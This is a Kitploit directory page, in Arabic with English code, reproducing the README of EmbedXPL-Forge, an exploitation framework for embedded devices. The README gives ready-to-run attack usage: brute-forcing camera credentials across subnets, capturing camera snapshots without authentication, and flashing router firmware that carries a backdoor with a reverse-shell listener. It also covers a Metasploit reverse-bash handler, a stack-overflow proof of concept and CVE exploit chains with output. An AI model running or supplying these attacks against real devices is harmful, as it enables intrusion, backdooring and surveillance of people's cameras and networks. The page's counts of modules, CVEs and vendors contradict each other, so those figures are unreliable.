Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
EmbedXPL-Forge — إطار تقييم أمن الأجهزة المدمجة — 700 وحدة، 350 ثغرة CVE، 55 مورّدًا، محرك مجموعات APT. يغطي أجهزة التوجيه، وكاميرات IP، ووحدات GPON ONT، وأجهزة CPE لدى مزوّدي خدمة الإنترنت، والحوسبة الطرفية المدمجة وإنترنت الأشياء. | Kitploit
أدوات/GitHubGitHub/mrhenrike/embedxpl-forge
أمان الأنظمة المدمجةأطر اختبار الاختراقماسحات الثغرات الأمنيةأطر الاستغلالأمان إنترنت الأشياءتخطيط الشبكةهجمات كلمات المرورتوليد الحمولةالاستغلالأمن SCADA/ICSأمان الأجهزة وإنترنت الأشياء
42822منذ 20س 15دتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
تحليل البرامج الثابتة
GitHubmrhenrike/embedxpl-forge

EmbedXPL-Forge

إطار تقييم أمن الأجهزة المدمجة — 700 وحدة، 350 ثغرة CVE، 55 مورّدًا، محرك مجموعات APT. يغطي أجهزة التوجيه، وكاميرات IP، ووحدات GPON ONT، وأجهزة CPE لدى مزوّدي خدمة الإنترنت، والحوسبة الطرفية المدمجة وإنترنت الأشياء.

عرض المستودعالموقع الإلكتروني

EmbedXPL-Forge

Python Platform License XPL Suite Issues Last Commit


ملاحظة حول المنصة: تم تصميم هذا الإطار واختباره بشكل أساسي على Linux (Debian/Ubuntu/Kali). معظم الوحدات المعتمدة على العتاد (محولات الشبكة اللاسلكية، أجهزة USB، الوصول المباشر إلى المقابس الخام، أدوات البرامج الثابتة) تتطلب Linux. قد يؤدي التشغيل على Windows أو macOS إلى أخطاء أو وظائف محدودة في العديد من الوحدات. يُوصى بشدة باستخدام Linux لتحقيق أقصى قدر من التوافق.


EmbedXPL-Forge

إطار تقييم أمن الأنظمة المدمجة والمحيطية

EmbedXPL-Forge هو إطار مفتوح المصدر للاستغلال والفحص مخصص لمتخصصي الأمن الذين يقومون بتدقيق أجهزة التوجيه والمحولات وكاميرات IP وأجهزة NVR/DVR وأجهزة GPON ONT وأجهزة ISP CPE والطابعات وإنترنت الأشياء (IoT) وأنظمة OT/ICS والأجهزة الطرفية المدمجة. يوفر أكثر من 2800 وحدة نشطة تغطي اختبار بيانات الاعتماد واستغلال الثغرات وفحص الشبكات وتوليد الحمولات وهجمات كاميرات RTSP والتلاعب بالبرامج الثابتة وتنسيق PolyExploit متعدد اللغات وترسانة كاملة للطابعات — مع أكثر من 700 ثغرة CVE موثقة عبر أكثر من 114 بائعًا ومحرك هجوم مجموعات APT الذي يعيد إنتاج سلاسل الهجمات الواقعية للدول القومية.

الإصدار: 3.2.0

الميزات

  • أكثر من 625 وحدة استغلال — RCE، تجاوز المصادقة، اجتياز المسار، الكشف عن المعلومات، تجاوز سعة المخزن المؤقت، اختطاف DNS، حقن الأوامر، باب خلفي، CSRF، فك تشفير الإعدادات، توليد مفاتيح WPA/WPS، مولّدات كلمات مرور المصنع، سلاسل BOF للمكدس/الكومة
  • 88 وحدة بيانات اعتماد — هجمات القاموس ضد FTP وSSH وTelnet وHTTP وSNMP وSFTP
  • أكثر من 185 وحدة استغلال للطابعات — HP، Canon، Lexmark، Xerox، Ricoh، Brother، Epson، Kyocera، Samsung؛ PJL/IPP/LPD/WSD/CUPS؛ سلاسل Pwn2Own 2026؛ PrintingShellz؛ إكراه NTLM عبر MS-RPRN
  • محرك كاميرات RTSP كامل — القوة الغاشمة للمسارات (أكثر من 195 مسارًا)، القوة الغاشمة لبيانات الاعتماد (أكثر من 80 زوجًا)، مصادقة Basic/Digest، RTSPS/TLS، نفق RTSP-over-HTTP (Python خالص، RFC 2326 App-C)، ماسح nmap/masscan/مباشر، ONVIF WS-Discovery، إخراج M3U
  • 7 نصوص Nmap NSE مخصصة — اكتشاف RTSP، بصمة الكاميرا، التحقق من ثغرات Hikvision/Dahua، اختبار بيانات الاعتماد الافتراضية، فحوصات CVE متعددة البائعين، التقاط اللقطات (pip install embedxpl[nse])
  • مجموعة استغلال البرامج الثابتة — اكتشاف الصيغة، حقن الباب الخلفي، ترقيع المجموع الاختباري، تجاوز فلاش البائع (NETGEAR، TP-Link، D-Link، ASUS)
  • منسّق PolyExploit — ترجمة C/C++ في وقت التشغيل (gcc/clang/mingw/cross)، تنفيذ استغلالات Ruby/Node.js/PHP/Bash/Perl، تكامل msfconsole، تكامل ExploitDB/searchsploit
  • وحدات ICS/OT — Universal Robots PolyScope 5، RIOT OS، Modbus، S7comm، EtherNet/IP، BACnet، DNP3
  • المنزل الذكي / البحري / المتخصص — eNet SMART HOME، OpenRemote، Metis maritime IoT (WIC/DFS)
  • أكثر من 5 وحدات ماسح — AutoPwn، ماسحات خاصة بالأجهزة، اكتشاف طابعات WSD/mDNS
  • 32 وحدة حمولة — أوامر عكسية/مربوطة TCP لـ x86 وx64 وARM وMIPS وPython وPerl وPHP
  • 13 وحدة ترميز — ترميز Base64 وhex لـ Python وPHP وPerl
  • 14 وحدة عامة — Heartbleed، ShellShock، UPnP IGD، القوة الغاشمة SNMP، TCP Xmas، تضخيم UDP، البحث عن CVE، كاشف اختطاف DNS، معترض AITM
  • أكثر من 700 ثغرة CVE موثقة — من 2001 إلى 2026، بما في ذلك سلاسل Pwn2Own 2026 وثغرات IoT/OT/البحرية الحرجة
  • محرك هجوم مجموعات APT — تصفح وإعادة إنتاج سلاسل الهجمات من APT28 وVolt Typhoon وSandworm وQuad7 وTurla وAPT40 مع تعيين MITRE ATT&CK
  • أكثر من 23 قائمة كلمات خاصة بالبائعين — بيانات اعتماد افتراضية خارجية لكل بائع (بما في ذلك ISP المخصص للبرازيل)
  • — SSDP، ARP، Nmap، Masscan، احتياطي Scapy، البحث عن OUI (أكثر من 39 ألف إدخال IEEE)، ملفات تعريف التوقيت T0–T5

أنواع الأجهزة المدعومة

البائعون المدعومون

الشبكات / أجهزة التوجيه / CPE: 2Wire · 3Com · ActionTec · Alcatel-Lucent · Alpha Networks · Arris · Aruba · Asmax · Astoria · ASUS · Belkin · BHU · Billion · Binatone · Calix · CERIO · Cisco · Cobham · Comtrend · D-Link · DD-WRT · Draytek · EasyBox (Arcadyan) · Edimax · EE BrightBox · EnGenius · FiberHome · Fortinet · Freebox · GL.iNet · GPON · HooToo · Huawei · Intelbras · IPFire · Juniper · LG · Linksys · Mercury · MiFi (Novatel) · MikroTik · MitraStar · Motorola · Movistar · Netcore · NETGEAR · Netsys · Observa Telecom · OpenWrt · RuggedCom · Ruijie · Seagate · SerComm · Shuttle · Sitecom · SMC · SonicWall · Starbridge · Technicolor · Tenda · Thomson · TOTOLINK · TP-Link · TRENDnet · Ubee · Ubiquiti · Unicorn · UTStarcom · Wavlink · Xiaomi · Zhone · Zoom · ZTE · ZyXEL

الكاميرات / NVR / DVR: Hikvision · Dahua · Axis · Reolink · Amcrest · Uniview (UNV) · Tapo (TP-Link) · Swann · ANNKE · Edimax · Intelbras · Grandstream · Foscam · Acti · Avigilon · Beward · Brickcom · Cisco cameras · Geuterbruck · Honeywell cameras · Jovision · Siemens cameras · Xiongmai (OEM) · Zivif · MVPower DVR · كاميرات P2P WiFi العامة · DVR/NVR OEM العام

الطابعات / MFP: HP LaserJet/PageWide · Canon imageRUNNER/imageClass · Lexmark CX/CS/MS/MX · Xerox WorkCentre/AltaLink/VersaLink · Ricoh MP/Aficio/SP · Brother MFC/DCP · Epson WorkForce · Kyocera ECOSYS · Samsung SyncThru · IPP/PJL/LPD/CUPS/WSD العام

NAS / VPN / جدار الحماية / الأمن: QNAP · Synology · D-Link NAS · Zyxel NAS · Ivanti · SonicWall · Fortinet (FortiOS/FortiGate/FortiWeb/FortiClient EMS) · Palo Alto (PAN-OS) · Cisco ASA/FTD · CheckPoint · Sophos XG · WatchGuard Firebox · Avocent

ICS / OT / الروبوتات: Universal Robots (UR3/UR5/UR10/UR16) · OpenPLC · Modbus TCP · Siemens S7 · EtherNet/IP CIP · BACnet · DNP3 · PROFINET DCP

المنزل الذكي / البحري / نظام التشغيل المدمج: eNet SMART HOME · OpenRemote IoT · Metis WIC/DFS (البحري) · RIOT OS · OpenWrt · VxWorks · QNX · Zephyr · wolfSSL · Tuya arduino-tuyaopen

التثبيت

الخيار 1 — PyPI (موصى به)```bash

pip install embedxpl embedxpl

root@kitploit:~
### الخيار 2 — باستخدام نصوص Nmap NSE```bash
# Install EmbedXPL + NSE dependencies
pip install "embedxpl[nse]"

# Install the 7 custom NSE scripts into Nmap's scripts directory
python -m embedxpl.nse install
# or using the entry point:
embedxpl-nse install

# Verify installation
python -m embedxpl.nse list

ملاحظة: على Linux/macOS قد تتطلب خطوة التثبيت sudo للكتابة إلى /usr/share/nmap/scripts/. شغّل: sudo python -m embedxpl.nse install

الخيار 3 — من المصدر```bash

git clone https://github.com/mrhenrike/EmbedXPL-Forge.git cd EmbedXPL-Forge chmod +x setup_venv.sh run.sh ./setup_venv.sh # creates .venv (PEP 668 safe) ./run.sh # recommended launcher

or: python exf.py # auto-detects .venv

Optional: also install NSE scripts

.venv/bin/python -m embedxpl.nse install

root@kitploit:~
### الخيار 4 — وحدة Python```bash
pip install embedxpl
python -m embedxpl

البدء السريع```bash

Install

pip install embedxpl

Launch interactive shell

embedxpl

Run a specific module directly

embedxpl -m exploits/routers/tplink/wr841n_credential_disclosure_cve_2023_50224 -s target 192.168.1.1

Network discovery

embedxpl -c "discover 192.168.1.0/24"

RTSP camera scan + brute-force

embedxpl -m exploits/cameras/multi/rtsp_cameradar_attack -s target 192.168.1.100

Nmap NSE quick scan (after pip install embedxpl[nse] + embedxpl-nse install)

nmap -p 554,5554,8554 --script embedxpl-rtsp-discover 192.168.1.0/24 nmap -p 80,443 --script 'embedxpl-*' 192.168.1.100

root@kitploit:~
## الاستخدام

### الصدفة التفاعلية```
exf > use exploits/routers/dlink/dir_300_600_rce
exf (D-Link DIR-300 & DIR-600 RCE) > show options
exf (D-Link DIR-300 & DIR-600 RCE) > set target 192.168.1.1
exf (D-Link DIR-300 & DIR-600 RCE) > check
exf (D-Link DIR-300 & DIR-600 RCE) > run

الأوامر الشائعة

محرك هجوم مجموعات APT```

List all cataloged threat actors

exf > apt list

Show APT28 attack chain details

exf > apt show apt28

Search for groups targeting MikroTik

exf > apt search mikrotik

Execute the full APT28 DNS hijack chain (interactive)

exf > apt run apt28

Execute only the credential disclosure attack (#0)

exf > apt run apt28 0

root@kitploit:~
### اكتشاف الشبكة```
# Auto-detect subnet from active interfaces and scan (default timing T3)
exf > discover

# Scan specific subnet with stealth timing
exf > discover 192.168.1.0/24 --timing T1

# Force fresh scan, ignore previous session history
exf > discover 192.168.1.0/24 --fresh

يكتشف باستخدام خط أنابيب متعدد المراحل: مسح ARP ← Nmap (فحوصات مضيف متعددة الطرق) ← Scapy ← احتياطي اتصال TCP. تتم مطابقة النتائج مع كتالوج الوحدات وتصفيتها حسب البائع/الطراز. تحل قاعدة بيانات IEEE OUI (embedxpl/data/oui.txt) عناوين MAC إلى بائعين مع البحث عبر الإنترنت أولاً والرجوع إلى المحلي. عندما يكشف مضيف عن قدرات WiFi، توصي الأداة بـ WirelessXPL-Forge للهجمات الخاصة باللاسلكي.

ملفات تعريف التوقيت (T0–T5) تحاكي اصطلاحات Nmap:

إدارة الجلسات```

List all hosts with scan history

exf > sessions list

Full history for one host: tested modules, findings, timestamps

exf > sessions show 192.168.1.1

Export session as JSON

exf > sessions export 192.168.1.1

Delete one session

exf > sessions delete 192.168.1.1

Purge all sessions

exf > sessions purge

root@kitploit:~
يتم تخزين الجلسات في `~/.exf_sessions/` بصيغة JSON، بمفتاح SHA-256 الخاص بـ IP+MAC. عند إعادة اكتشاف مضيف معروف، تُعرض الوحدات التي تم اختبارها بالفعل كـ `[Tested]` ويتم تخطيها افتراضيًا.

### AutoPwn Scanner```
exf > use scanners/autopwn
exf (AutoPwn) > set target 192.168.1.0/24
exf (AutoPwn) > run

محرك كاميرا RTSP

خط أنابيب هجوم RTSP كامل الميزات مع تنفيذ أصلي بلغة Python يغطي جميع أوضاع نقل RTSP القياسية.

أوضاع النقل

خط أنابيب الهجوم```python

from embedxpl.core.rtsp.scanner import RTSPScanner from embedxpl.core.rtsp.attacker import RTSPAttacker from embedxpl.core.rtsp.models import RTSPStream

1. Discover RTSP-speaking hosts on the network

scanner = RTSPScanner(timeout=5.0) hosts = scanner.scan_network("192.168.1.0/24", ports=[554, 5554, 8554])

Returns: [('192.168.1.100', 554), ('192.168.1.101', 8554), ...]

2. Run full 5-phase attack pipeline

attacker = RTSPAttacker(timeout=5.0) results = attacker.attack_all(hosts)

3. Inspect results

for stream in results: print(stream.url) # rtsp://admin:@192.168.1.100:554/h264/ch1/main/av_stream print(stream.username) # admin print(stream.password) # (empty string) print(stream.route) # h264/ch1/main/av_stream print(stream.auth_type) # AuthType.BASIC print(stream.accessible) # True

root@kitploit:~
**المخرجات المتوقعة:**```
[RTSP] Scanning 192.168.1.0/24 on ports [554, 5554, 8554]...
[RTSP] Found 3 RTSP hosts
[RTSP] 192.168.1.100:554 — Phase 1: Route discovery (195 routes)...
[RTSP] 192.168.1.100:554 — Route found: h264/ch1/main/av_stream
[RTSP] 192.168.1.100:554 — Phase 2: Auth detection → Basic (realm="IP Camera")
[RTSP] 192.168.1.100:554 — Phase 3: Credential brute-force (80 pairs)...
[RTSP] 192.168.1.100:554 — ✓ Credentials: admin:
[RTSP] 192.168.1.100:554 — Phase 4: Stream validated (200 OK)
[RTSP] Attack complete. Accessible streams: 2/3

وضع المسح التخطي (المضيفون المعروفون)```python

Skip network scan, attack known hosts directly

hosts = scanner.skip_scan(["192.168.1.100:554", "192.168.1.101"])

Accepts: "host:port", "host", CIDR "192.168.1-2.0-255", hostnames

root@kitploit:~
**المدخل/المخرج المتوقع:**```python
# Input
hosts = scanner.skip_scan(["camera.local:554", "192.168.1-2.100-110"])

# Output: [(resolved_ip, port), ...]
# [('192.168.1.100', 554), ('192.168.1.200', 554), ('192.168.1.100', 554), ...]

نفق RTSP-over-HTTP

يُستخدم عندما تكون الكاميرات خلف وكلاء HTTP أو جدران حماية مؤسسية تحجب TCP/554.```python from embedxpl.core.rtsp.client import RTSPClient, RTSPOverHTTPTunnel

Direct tunnel usage

tunnel = RTSPOverHTTPTunnel(host="10.0.0.50", port=8080, timeout=10.0) response = tunnel.send_rtsp_via_http( "OPTIONS rtsp://10.0.0.50:8080/ RTSP/1.0\r\nCSeq: 1\r\n\r\n" )

Returns: raw RTSP response bytes (base64-decoded from HTTP body)

Or via RTSPClient factory

client = RTSPClient.from_scheme("10.0.0.50", 8080, "http", timeout=10.0) status, server, methods = client.options() # → (200, "Hikvision NVRA", "OPTIONS, DESCRIBE, SETUP, PLAY")

root@kitploit:~
**المدخل/المخرج المتوقع:**```
Input : host=10.0.0.50, port=8080, scheme="http"
Output:
  status  = 200
  server  = "Hikvision IP Camera NVRA (V5.4.5)"
  methods = "OPTIONS, DESCRIBE, SETUP, PLAY, TEARDOWN"

وحدة RTSP (تفاعلية)```

embedxpl > use exploits/cameras/multi/rtsp_cameradar_attack embedxpl (RTSP Cameradar Attack) > show options

Option Default Description


target required Target IP/CIDR/range (e.g. 192.168.1.0/24) ports 554,5554,8554 RTSP ports to scan timeout 5 Connection timeout (seconds) scheme rtsp Transport: rtsp | rtsps | http | https skip_scan false Skip nmap discovery, attack directly output_m3u false Save accessible streams to streams.m3u onvif_discover false Enable ONVIF WS-Discovery

embedxpl (RTSP Cameradar Attack) > set target 192.168.1.0/24 embedxpl (RTSP Cameradar Attack) > set output_m3u true embedxpl (RTSP Cameradar Attack) > run

root@kitploit:~
## نصوص Nmap NSE

يتضمن EmbedXPL-Forge 7 نصوص Nmap NSE مخصصة لفحص إنترنت الأشياء/الكاميرات واكتشاف CVE.

### التثبيت```bash
# Install with NSE extras
pip install "embedxpl[nse]"

# Install scripts to Nmap (Linux/macOS may need sudo)
python -m embedxpl.nse install
# or
embedxpl-nse install

# Force overwrite existing scripts
python -m embedxpl.nse install --force

# Custom Nmap directory
python -m embedxpl.nse install --nse-dir /opt/homebrew/share/nmap/scripts

المخرجات المتوقعة:``` [OK] embedxpl-rtsp-discover.nse → /usr/share/nmap/scripts/embedxpl-rtsp-discover.nse [OK] embedxpl-camera-identify.nse → /usr/share/nmap/scripts/embedxpl-camera-identify.nse [OK] embedxpl-hikvision-vuln.nse → /usr/share/nmap/scripts/embedxpl-hikvision-vuln.nse [OK] embedxpl-dahua-vuln.nse → /usr/share/nmap/scripts/embedxpl-dahua-vuln.nse [OK] embedxpl-rtsp-creds.nse → /usr/share/nmap/scripts/embedxpl-rtsp-creds.nse [OK] embedxpl-iot-cve-check.nse → /usr/share/nmap/scripts/embedxpl-iot-cve-check.nse [OK] embedxpl-camera-snapshot.nse → /usr/share/nmap/scripts/embedxpl-camera-snapshot.nse

Installed: 7 script(s) [OK] nmap --script-updatedb complete

root@kitploit:~
### عرض / معلومات```bash
python -m embedxpl.nse list
python -m embedxpl.nse info rtsp-discover

مرجع سكربتات NSE

embedxpl-rtsp-discover — اكتشاف خدمة RTSP

يكتشف خدمات RTSP، ويلتقط بانر Server:، ويحدد المورّد، ويسرد الطرق المدعومة، ويقارنها مع ثغرات CVE المعروفة.```bash

Basic usage

nmap -p 554,5554,8554 --script embedxpl-rtsp-discover 192.168.1.0/24

With custom timeout

nmap -p 554,5554,8554 --script embedxpl-rtsp-discover --script-args rtsp.timeout=3 192.168.1.0/24

root@kitploit:~
**المخرجات المتوقعة:**```
554/tcp open rtsp
| embedxpl-rtsp-discover:
|   Status : 200
|   Server : Hikvision IP Camera NVRA (V5.4.5)
|   Methods: OPTIONS, DESCRIBE, SETUP, PLAY, TEARDOWN
|   Vendor : Hikvision
|   Known CVEs: CVE-2021-36260 (RCE, CVSS 9.8), CVE-2017-7921 (Auth Bypass)
|   EmbedXPL module: exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
|   Exploit hint: embedxpl > use exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
|_  Full attack: embedxpl > use exploits/cameras/multi/rtsp_cameradar_attack

embedxpl-camera-identify — بصمة الكاميرا العميقة

تحديد متعدد البروتوكولات: يستكشف واجهة الويب HTTP/HTTPS، ولافتة RTSP، وONVIF. يستخرج الشركة المصنعة، والطراز، والبرنامج الثابت، والرقم التسلسلي، وعنوان MAC.```bash nmap -p 80,443,554,37777 --script embedxpl-camera-identify 192.168.1.100 nmap -sV -p- --script embedxpl-camera-identify 192.168.1.0/24

root@kitploit:~
**المخرجات المتوقعة (Hikvision):**```
80/tcp open http
| embedxpl-camera-identify:
|   Protocol : HTTP (HTTP 200)
|   Vendor   : Hikvision
|   Model    : DS-2CD2143G0-I
|   Firmware : V5.6.2 build 190401
|   Serial   : DS-2CD2143G0-I20190401AAWRA123456789
|   CVEs     : CVE-2021-36260 (RCE, CVSS 9.8) | CVE-2017-7921 (Auth Bypass)
|   Vuln assessment: LIKELY VULNERABLE (endpoint accessible without auth)
|   EmbedXPL module: exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
|_  Run exploit: embedxpl > use exploits/cameras/hikvision/rtsp_rce_cve_2021_36260

embedxpl-hikvision-vuln — أداة فحص ثغرات Hikvision

التحقق النشط من CVE-2021-36260 (تنفيذ التعليمات عن بُعد عبر /SDK/webLanguage، CVSS 9.8) و CVE-2017-7921 (تجاوز المصادقة للحصول على لقطة).```bash nmap -p 80,443,8080 --script embedxpl-hikvision-vuln 192.168.1.100 nmap -p 80,443,8080 --script embedxpl-hikvision-vuln --script-args timeout=10 192.168.1.0/24

root@kitploit:~
**المخرجات المتوقعة:**```
80/tcp open http
| embedxpl-hikvision-vuln:
|   Device          : DS-2CD2143G0-I
|   Firmware        : V5.3.0 build 170112
|   CVE-2021-36260  : VULNERABLE — endpoint accepts PUT without authentication (CVE-2021-36260, CVSS 9.8)
|   CVE-2017-7921   : VULNERABLE — snapshot captured without valid credentials (CVE-2017-7921)
|   EmbedXPL RCE module  : exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
|   EmbedXPL Auth Bypass : exploits/cameras/hikvision/info_disclosure_cve_2017_7921
|_  Run full exploit: embedxpl > use exploits/cameras/hikvision/rtsp_rce_cve_2021_36260

embedxpl-dahua-vuln — أداة فحص ثغرات Dahua

تختبر CVE-2021-33044 (تجاوز المصادقة، CVSS 9.8)، وCVE-2020-25078 (الكشف عن المستخدمين)، وCVE-2013-6117 (أجهزة DVR القديمة). كما تغطي شركات تصنيع Dahua: Amcrest وIntelbras وTVT وJovision وANNKE.```bash nmap -p 80,37777 --script embedxpl-dahua-vuln 192.168.1.0/24

root@kitploit:~
**المخرجات المتوقعة:**```
80/tcp open http
| embedxpl-dahua-vuln:
|   Vendor         : Dahua (or Dahua-OEM: Amcrest / Intelbras / TVT)
|   CVE-2021-33044 : VULNERABLE — snapshot captured via Digest bypass (CVE-2021-33044, CVSS 9.8)
|   CVE-2020-25078 : VULNERABLE — Users disclosed: [admin, operator]
|   CVE-2013-6117  : NOT VULNERABLE
|   EmbedXPL Auth Bypass  : exploits/cameras/dahua/cctv_auth_bypass_cve_2021_33044
|   EmbedXPL Cred Extract : exploits/cameras/dahua/cctv_37777_credential_extraction
|_  Run exploit: embedxpl > use exploits/cameras/dahua/cctv_auth_bypass_cve_2021_33044

embedxpl-rtsp-creds — أداة اختبار بيانات اعتماد RTSP الافتراضية

تختبر 18 زوجًا من بيانات الاعتماد الافتراضية عبر أكثر من 9 مسارات RTSP شائعة باستخدام مصادقة Basic. وتُبلّغ عن أول تطابق.```bash nmap -p 554,5554,8554 --script embedxpl-rtsp-creds 192.168.1.100

With custom route hint

nmap -p 554 --script embedxpl-rtsp-creds --script-args rtsp.route=live.sdp 192.168.1.100

root@kitploit:~
**المخرجات المتوقعة:**```
554/tcp open rtsp
| embedxpl-rtsp-creds:
|   Server           : Hikvision IP Camera NVRA
|   Credential found : admin: (empty password)
|   Stream URL       : rtsp://admin:@192.168.1.100:554/h264/ch1/main/av_stream
|   Auth type        : Basic
|   Response code    : 200
|   EmbedXPL full scan : exploits/cameras/multi/rtsp_cameradar_attack
|_  Run exploit: embedxpl > use exploits/cameras/multi/rtsp_cameradar_attack

embedxpl-iot-cve-check — بصمة CVE متعددة البائعين

يكتشف ويتحقق من 10 ثغرات CVE نشطة عبر Hikvision وDahua وD-Link NAS وReolink وUniview وQNAP وSonicWall وGPON.```bash nmap -p 80,443,8080 --script embedxpl-iot-cve-check 192.168.1.0/24

root@kitploit:~
**المخرجات المتوقعة:**```
80/tcp open http
| embedxpl-iot-cve-check:
|   CVE-2021-36260 (Hikvision, CVSS 9.8): POSSIBLY VULNERABLE — HTTP 200 returned
|     → EmbedXPL: CVE-2021-36260 : use exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
|   CVE-2021-33044 (Dahua, CVSS 9.8)   : NOT VULNERABLE — HTTP 404
|   EmbedXPL-Forge: https://github.com/mrhenrike/EmbedXPL-Forge
|_  Full exploitation: pip install embedxpl && embedxpl

embedxpl-camera-snapshot — الوصول غير المُصادَق إلى اللقطة

يفحص 16 نقطة نهاية للقطة خاصة بمورّدين محددين. يُبلّغ عن أي عنوان URL يُرجع image/* دون بيانات اعتماد. اختياريًا يحفظ ملفات JPEG محليًا.```bash nmap -p 80,443,8080 --script embedxpl-camera-snapshot 192.168.1.100

Save snapshots to disk

nmap -p 80 --script embedxpl-camera-snapshot --script-args outdir=/tmp/snaps 192.168.1.0/24

root@kitploit:~
**المخرجات المتوقعة:**```
80/tcp open http
| embedxpl-camera-snapshot:
|   Endpoint 1 (Dahua):
|     URL          : http://192.168.1.100:80/cgi-bin/snapshot.cgi?channel=1
|     Content-Type : image/jpeg
|     Size         : 45231 bytes
|     Access       : UNAUTHENTICATED SNAPSHOT ACCESS
|     EmbedXPL module: exploits/cameras/dahua/cctv_auth_bypass_cve_2021_33044
|_    Run exploit: embedxpl > use exploits/cameras/dahua/cctv_auth_bypass_cve_2021_33044

تشغيل جميع سكربتات NSE عبر Python```bash

Run all scripts via embedxpl-nse CLI

python -m embedxpl.nse run --target 192.168.1.0/24 --scripts all

Run specific scripts

python -m embedxpl.nse run --target 192.168.1.100 --scripts rtsp-discover,hikvision-vuln

With output file

python -m embedxpl.nse run --target 192.168.1.0/24 --scripts all --output /tmp/scan.txt

Custom ports

python -m embedxpl.nse run --target 192.168.1.0/24 --scripts all --ports 80,443,554,5554,8080,8554

root@kitploit:~
**إلغاء التثبيت:**```bash
python -m embedxpl.nse uninstall

استغلال البرامج الثابتة```

embedxpl > use exploits/firmware/netgear_firmware_flash embedxpl (NETGEAR Firmware Flash) > set target 192.168.1.1 embedxpl (NETGEAR Firmware Flash) > set firmware /path/to/backdoored.bin embedxpl (NETGEAR Firmware Flash) > set lhost 10.0.0.10 embedxpl (NETGEAR Firmware Flash) > set lport 4444 embedxpl (NETGEAR Firmware Flash) > run

root@kitploit:~
**ما الذي يفعله:**
1. يكتشف تنسيق البرنامج الثابت (TRX، DLOB، SEAMA، WRGG، ثنائي خام)
2. يحقن بابًا خلفيًا لصدفة عكسية عند إزاحة مناسبة
3. يعيد حساب CRC32/MD5 checksum
4. يرفع عبر نقطة نهاية فلاش خاصة بالمورّد (مع تجاوز المصادقة حيث ينطبق ذلك)
5. ينتظر إعادة تشغيل الجهاز ويتحقق من تنفيذ الباب الخلفي


## PolyExploit Orchestrator

يتيح التجميع وقت التشغيل لـ C/C++ وتنفيذ نصوص متعددة اللغات للاستغلالات غير القابلة للنقل إلى Python الصرفة.

### التجميع وقت التشغيل لـ C/C++```python
from embedxpl.core.poly import CCompiler

compiler = CCompiler()

# Check available compilers
print(compiler.compiler_available())  # {'gcc': True, 'clang': False, 'mingw': False}

# Compile a C PoC exploit at runtime
binary = compiler.compile_c(
    source="""
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[]) {
    // Stack overflow PoC
    char buf[64];
    memcpy(buf, argv[1], atoi(argv[2]));
    return 0;
}
""",
    arch="x86",   # x86, x64, arm, mips, mingw
)
# Returns: Path to compiled binary (cached by source hash)

# Execute with arguments
output = compiler.run_binary(binary, args=["AAAA"*100, "400"])
print(output.stdout)

تنفيذ البرامج النصية متعددة اللغات```python

from embedxpl.core.poly import PolyRunner

runner = PolyRunner() print(runner.available_runtimes())

{'ruby': True, 'node': True, 'php': True, 'bash': True, 'perl': True}

Execute a Ruby exploit

result = runner.run_ruby(""" require 'net/http' resp = Net::HTTP.get_response(URI('http://192.168.1.1/cgi-bin/exploit')) puts resp.body """, args=["192.168.1.1"])

Metasploit integration

runner.run_metasploit(module="exploit/multi/handler", options={ "PAYLOAD": "cmd/unix/reverse_bash", "LHOST": "10.0.0.10", "LPORT": "4444", })

ExploitDB / searchsploit lookup

results = runner.searchsploit("hikvision rtsp") for r in results: print(r["Title"], r["Path"])

root@kitploit:~
## جديد في الإصدار v3.1.0 — CVE 2026/2025/2024 + نطاق الطابعات + بوابات الجودة

**54 وحدة جديدة** عبر الطابعات، ونظام التشغيل المدمج، وICS/OT، والمنزل الذكي، وإنترنت الأشياء البحري، وسلاسل Pwn2Own 2026. أبرز النقاط:

### سلاسل Pwn2Own 2026```
# CUPS Pwn2Own 2026 — Full 4-stage chain (CVE-2026-34477/78/79/80, CVSS 9.9)
exf > use exploits/printers/linux/cups_pwn2own_chain_cve_2026_34480
exf (CUPS Pwn2Own Chain) > set target 192.168.1.10
exf (CUPS Pwn2Own Chain) > set delay 2
exf (CUPS Pwn2Own Chain) > run
[*] [Stage 1/4] Triggering UAF in cups-browsed (CVE-2026-34477)
[*] [Stage 2/4] Heap spray via IPP job attributes (CVE-2026-34478)
[*] [Stage 3/4] ROP chain LPE delivery (CVE-2026-34479)
[*] [Stage 4/4] Chain complete - verifying
[+] CUPS process no longer responding - chain executed

# Lexmark Pwn2Own 2026 — 3-stage chain
exf > use exploits/printers/lexmark/lexmark_pwn2own_2026_chain
exf (Lexmark Pwn2Own) > set target 192.168.1.20
exf (Lexmark Pwn2Own) > run

ثغرات CVE الحرجة لعام 2026```

wolfSSL identity forgery (CVE-2026-5194, CVSS 9.3, ~5B devices)

exf > use exploits/embedded_os/wolfssl_identity_forgery_cve_2026_5194 exf (wolfSSL Identity Forgery) > set target 192.168.1.1 exf (wolfSSL Identity Forgery) > set port 443 exf (wolfSSL Identity Forgery) > run

PAN-OS User-ID BOF (CVE-2026-0300, CVSS 9.8, active exploitation)

exf > use exploits/firewalls/paloalto/panos_userid_bof_rce_cve_2026_0300 exf (PAN-OS User-ID BOF) > set target 10.0.0.1 exf (PAN-OS User-ID BOF) > set port 443 exf (PAN-OS User-ID BOF) > run

Universal Robots PolyScope 5 (CVE-2026-8153, CVSS 9.8, unauth OS cmd injection)

